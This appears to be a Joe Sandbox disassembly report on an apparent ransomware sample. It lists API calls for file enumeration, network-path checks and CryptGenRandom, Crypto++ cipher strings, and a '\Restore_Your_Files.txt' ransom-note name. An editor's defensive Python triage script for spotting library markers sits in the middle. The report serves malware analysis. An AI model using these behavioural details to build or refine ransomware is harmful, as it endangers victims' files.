                                                                                                          • Part of subcall function 00B05963: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00B05976
                                                                                                        • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00B042E6
                                                                                                          • Part of subcall function 00B05A76: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00B05AA0
                                                                                                          • Part of subcall function 00B05A76: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00B05B0F
                                                                                                        • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00B04418
                                                                                                        • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00B04478
                                                                                                        • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00B04484
                                                                                                        • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00B044BF
                                                                                                        • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00B044E0
                                                                                                        • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00B044EC
                                                                                                        • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00B044F5
                                                                                                        • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00B0450D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                        • String ID:
                                                                                                        • API String ID: 2508902052-0
                                                                                                        • Opcode ID: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                                                                                        • Instruction ID: 0ca2454eb47dc92c9cfe1a904f2f17824c1af9866a8435bf22e4369e8adcbe14
                                                                                                        • Opcode Fuzzy Hash: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                                                                                        • Instruction Fuzzy Hash: F9815BB1E006259FCB18DFA8C580A6EBBF5FF48304B1586ADD545A7781CB70ED52CB84
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A75130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00A75198
                                                                                                          • Part of subcall function 00A75130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00A751AC
                                                                                                          • Part of subcall function 00A75130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00A751C0
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A8EEE0
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EF8B
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EFA1
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EFC0
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EFD7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path$Network$CreateSemaphore$Ios_base_dtorstd::ios_base::_
                                                                                                        • String ID: X$\Restore_Your_Files.txt
                                                                                                        • API String ID: 3524565764-1189399128
                                                                                                        • Opcode ID: e562a0d875bd1d91a87eba6fd5a2c46b51d57e2a5b5db00ba455187eb4ce8490
                                                                                                        • Instruction ID: 3d68a3591fd7be7f9fad3dfb961ea3d20c8069aae09790fe25a555042b2a1bf0
                                                                                                        • Opcode Fuzzy Hash: e562a0d875bd1d91a87eba6fd5a2c46b51d57e2a5b5db00ba455187eb4ce8490
                                                                                                        • Instruction Fuzzy Hash: B772D071E00259DFDF14EB68CD85BEDBBB5AF45300F1441A9E809A7282DB709E84CF91
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB5477
                                                                                                        Strings
                                                                                                        • Unflushable<T>: this object has buffered input that cannot be flushed, xrefs: 00AB550E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: Unflushable<T>: this object has buffered input that cannot be flushed
                                                                                                        • API String ID: 2005118841-3781273281
                                                                                                        • Opcode ID: 01fe46d621cbce5ebece7225ba1f3f3f0dcf12112009a01c64c482496e8805c8
                                                                                                        • Instruction ID: 40fada0bfb1b3ae8ce6b9d419ae97bb7694972b831c30773f32e8d7b826775f2
                                                                                                        • Opcode Fuzzy Hash: 01fe46d621cbce5ebece7225ba1f3f3f0dcf12112009a01c64c482496e8805c8
                                                                                                        • Instruction Fuzzy Hash: CDA15C72904208EFCB05DFA4D845FEEBBF8FB08710F404AA9F915A7691DB74A954CB90
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: ec2b6692147009731765028fa7c1276a0efe589626af6698708b2e5c36840422
                                                                                                        • Instruction ID: 66973595963d400540dc0ee8981c4b8bb73b3c536341ccd02a89869742df8511
                                                                                                        • Opcode Fuzzy Hash: ec2b6692147009731765028fa7c1276a0efe589626af6698708b2e5c36840422
                                                                                                        • Instruction Fuzzy Hash: ADC21671E086288FDB25DE289D807EAB7F9EB84305F1545EAD84DE7240E774AF819F40
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(FFFFFFFF,AE695AF0,?,?,?,?,?,00B50278,000000FF), ref: 00B00315
                                                                                                        • TlsSetValue.KERNEL32(FFFFFFFF,?), ref: 00B00359
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00B50278,000000FF), ref: 00B0037F
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00B50278,000000FF), ref: 00B00386
                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 00B003C0
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B003C7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B003D0
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B003D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess$Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3709577838-0
                                                                                                        • Opcode ID: a859e69bb5fc0a75c9e51bfa48ae6e034af3df8d5d1cff6d8ec2d65c31f90de9
                                                                                                        • Instruction ID: 6fe632d2e168475029e218e13bf5a47edc46ca01b87f4a40fbf3db5c563b356c
                                                                                                        • Opcode Fuzzy Hash: a859e69bb5fc0a75c9e51bfa48ae6e034af3df8d5d1cff6d8ec2d65c31f90de9
                                                                                                        • Instruction Fuzzy Hash: 094150316103009FDB25AFA9D889B1ABBE8EF09B61F0445A8F915E73D1DB70EC00CB64
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000010,AE695AF0,7597FC30,?), ref: 00AD43E0
                                                                                                        • CryptReleaseContext.ADVAPI32(00000001,00000000,?,00000000,?,00B562DC,00000002, operation failed with error ,0000001D,?,?,OS_Rng: ,00000008,?), ref: 00AD4710
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextCryptErrorLastRelease
                                                                                                        • String ID: operation failed with error $OS_Rng:
                                                                                                        • API String ID: 3299239745-700108173
                                                                                                        • Opcode ID: 400e9573fe19dfc70ce6591c2ddbd83d1283c2d976d444b789018b637411b0e9
                                                                                                        • Instruction ID: 0f18e2205197193c16e6bc4cba17076e705b857c46aafe6f2c9168e2e2c02258
                                                                                                        • Opcode Fuzzy Hash: 400e9573fe19dfc70ce6591c2ddbd83d1283c2d976d444b789018b637411b0e9
                                                                                                        • Instruction Fuzzy Hash: 1DA1E371910248DFEB18DF68CD88B9EBBB1FF49304F148299E005AB3D2DB759A84CB50
                                                                                                        APIs
                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,AE695AF0), ref: 00A753FE
                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000001,774D30DF,AE695AF0), ref: 00A754D9
                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00A755E6
                                                                                                        Strings
                                                                                                        • boost shared_lock has no mutex, xrefs: 00A75554
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectReleaseSemaphoreSingleWait___std_exception_destroy
                                                                                                        • String ID: boost shared_lock has no mutex
                                                                                                        • API String ID: 1459948668-3890706923
                                                                                                        • Opcode ID: b333061435646deae1af4b702f78becdd07a0e77ea770738d96113585bb81f7a
                                                                                                        • Instruction ID: e9e104f7e51c875784cd047a57be8d96dac4bcb606948c1a3d90f8c92bf432a8
                                                                                                        • Opcode Fuzzy Hash: b333061435646deae1af4b702f78becdd07a0e77ea770738d96113585bb81f7a
                                                                                                        • Instruction Fuzzy Hash: CB81AF71E00A059FDB18CF64CD51BBAB7B6EF44314F14C16DE91AAB390DBB4AA44CB90
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0,00000000,?,00000000), ref: 00A884E3
                                                                                                        • FindFirstFileW.KERNEL32(?,?,00B6FBE0,00000002,00B6FBDC,?,?,?), ref: 00A8853F
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0), ref: 00A8AF9D
                                                                                                        • FindFirstFileW.KERNEL32(?,?,00B6FBE0,00000002), ref: 00A8AFC5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileFindFirstMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 3909587737-0
                                                                                                        • Opcode ID: a85e701ef11938fa7e073f7f635e6709032d42221da8fd40d01582035727eca9
                                                                                                        • Instruction ID: e5b5372e5b7f5bb18167505fcd27e7a465e840469e22ea514cf4235d20ad255f
                                                                                                        • Opcode Fuzzy Hash: a85e701ef11938fa7e073f7f635e6709032d42221da8fd40d01582035727eca9
                                                                                                        • Instruction Fuzzy Hash: E3C1F671A101099FDB18EF68CD85BAEBBB5FF84310F50866DF81597290DB38EA45CB90
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00B30C70,?,?,?,?,00B306C7,?,00000004), ref: 00B3E5EC
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00B3E67C
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00B3E68A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00B30C70,00000000,00B30D90), ref: 00B3E72D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 4212172061-0
                                                                                                        • Opcode ID: 0711d029d3e4991ee041b65263a9848a912d951be7dc15dc060dc0cd2420cc4e
                                                                                                        • Instruction ID: f1368d8e40333a1ba856dd51d1616cce4e0097d472ef3e53d5052def6ca3a3c0
                                                                                                        • Opcode Fuzzy Hash: 0711d029d3e4991ee041b65263a9848a912d951be7dc15dc060dc0cd2420cc4e
                                                                                                        • Instruction Fuzzy Hash: 7F61E571600606AADB24AB75DC86FAA77E8EF54700F3404EBF925DB1C1EB70E90087A4
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ADE0CD
                                                                                                        Strings
                                                                                                        • : block size of underlying block cipher is not 16, xrefs: 00ADE09E
                                                                                                        • TableSize, xrefs: 00ADDA28
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: : block size of underlying block cipher is not 16$TableSize
                                                                                                        • API String ID: 2005118841-2295039505
                                                                                                        • Opcode ID: 8dd08fd9e05c02ae9aaad0ce15c1b44145d9bd4b850a6b9d1456f7dfc529c1d3
                                                                                                        • Instruction ID: e7d536c947dc6ec96bab61dde960ffdfc6b51d599ed5677d048837231870153e
                                                                                                        • Opcode Fuzzy Hash: 8dd08fd9e05c02ae9aaad0ce15c1b44145d9bd4b850a6b9d1456f7dfc529c1d3
                                                                                                        • Instruction Fuzzy Hash: 7B3218B1D002198FDB24CF69C944A9DF7B5FF98304F25866ED45AAB352DB70A981CF80
                                                                                                        APIs
                                                                                                          • Part of subcall function 00AD47F0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00AD487A
                                                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,AE695AF0), ref: 00AD479A
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AD47E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                                                        • String ID: CryptGenRandom
                                                                                                        • API String ID: 1047471967-3616286655
                                                                                                        • Opcode ID: 6713dad64c805c4cdbd44fee75b1ff69b6c46a961da9c6b7884ccb3f01ab467a
                                                                                                        • Instruction ID: d5ebbcbbb9cfb30ae456312ba5fa46b37c2936c6e94511125b8e748e0c64f767
                                                                                                        • Opcode Fuzzy Hash: 6713dad64c805c4cdbd44fee75b1ff69b6c46a961da9c6b7884ccb3f01ab467a
                                                                                                        • Instruction Fuzzy Hash: 10015231944208AFCB15EF94DC45FDEBBF8FB09750F4045AAE812AB2A0DF74A904CB90
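The string arguments recorded in the preceding function records (" operation failed with error " with "OS_Rng: " and "CryptGenRandom"; ": block size of underlying block cipher is not 16" with "TableSize"; "boost shared_lock has no mutex"; the "1#IND$1#INF$1#QNAN$1#SNAN" float-formatting set) are the kind of library-specific diagnostics an analyst uses to work out which crypto and runtime components a sample statically links. The script below is an added triage example written for this page; it is not part of the Joe Sandbox report or of the sample. The mapping of each marker to a component is the editor's inference from the message formats used by Crypto++ (its OS_RNG_Err and authenticated-encryption-mode exceptions), Boost.Thread and the MSVC CRT, not a statement the report makes, and the binary it scans is a constructed byte blob, not the sample.

```python
"""Triage helper: locate library-specific diagnostic strings in a binary.

Added example for this page, not code from the report or the sample.
Marker-to-component attribution is an assumption (editor's inference from
the message formats of Crypto++, Boost.Thread and the MSVC CRT).
"""
import re
from collections import defaultdict

# Marker strings taken from the function listing above. The component each
# one is mapped to is an assumption, not something the report asserts.
MARKERS = {
    b"OS_Rng: ": "Crypto++ OS_RNG_Err (OS random source wrapper)",
    b" operation failed with error ": "Crypto++ OS_RNG_Err (OS random source wrapper)",
    b"CryptGenRandom": "Win32 CryptoAPI RNG (ADVAPI32)",
    b": block size of underlying block cipher is not 16": "Crypto++ GCM/CCM/EAX authenticated-encryption mode",
    b"TableSize": "Crypto++ GCM table-size option",
    b"boost shared_lock has no mutex": "Boost.Thread shared_lock",
    b"1#QNAN": "MSVC CRT floating-point formatting",
}


def _encodings(marker: bytes):
    """Yield the marker as ASCII and as UTF-16LE; Win32 binaries carry both."""
    yield "ascii", marker
    yield "utf-16le", marker.decode("ascii").encode("utf-16-le")


def find_markers(data: bytes) -> dict:
    """Return {component: [(encoding, offset, marker_text), ...]} for every hit."""
    hits = defaultdict(list)
    for marker, component in MARKERS.items():
        for enc, needle in _encodings(marker):
            for m in re.finditer(re.escape(needle), data):
                hits[component].append((enc, m.start(), marker.decode("ascii")))
    return {component: sorted(found) for component, found in hits.items()}


def summarize(data: bytes) -> list:
    """Sorted list of the components inferred from the markers present."""
    return sorted(find_markers(data))


# Constructed stand-in for a binary: null padding with a few of the report's
# strings embedded, one of them as UTF-16LE to exercise the wide-string path.
SAMPLE = (
    b"\x00" * 64
    + b"OS_Rng: " + b"CryptGenRandom" + b" operation failed with error " + b"\x00" * 16
    + b"AES/GCM: block size of underlying block cipher is not 16\x00"
    + b"TableSize\x00"
    + "boost shared_lock has no mutex".encode("utf-16-le") + b"\x00" * 8
    + b"1#QNAN\x00"
)

if __name__ == "__main__":
    for component, found in find_markers(SAMPLE).items():
        for enc, offset, text in found:
            print(f"{offset:#08x} {enc:<9} {component}: {text!r}")
```

Run against a real dump (for example the main image dump listed under Memory Dump Source), `find_markers(open(path, "rb").read())` gives offsets that can be cross-checked against the xrefs in the listing; a hit on the OS_RNG_Err and CryptGenRandom markers together indicates the sample draws its key material from the OS RNG through a library wrapper rather than from a home-grown generator, which matters when assessing whether encrypted files are recoverable.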
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __onexit
                                                                                                        • String ID: Dflt$Dflt$Dflt$Dflt
                                                                                                        • API String ID: 1448380652-281602996
                                                                                                        • Opcode ID: 6c9b0d0bf1b05f6382f6967b02e20bbbb9e82d258acc17c84928640b4bfd3f8c
                                                                                                        • Instruction ID: c6c8adc0c8f6732909bbbdff0629c92299c6b5b03d7a589a7b7073c3713b0ceb
                                                                                                        • Opcode Fuzzy Hash: 6c9b0d0bf1b05f6382f6967b02e20bbbb9e82d258acc17c84928640b4bfd3f8c
                                                                                                        • Instruction Fuzzy Hash: 4C1136B1564748EFE741EF54EE1AB5A7BE0E705708F00825AE5056B3E0CFBA1108CF94
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343D9
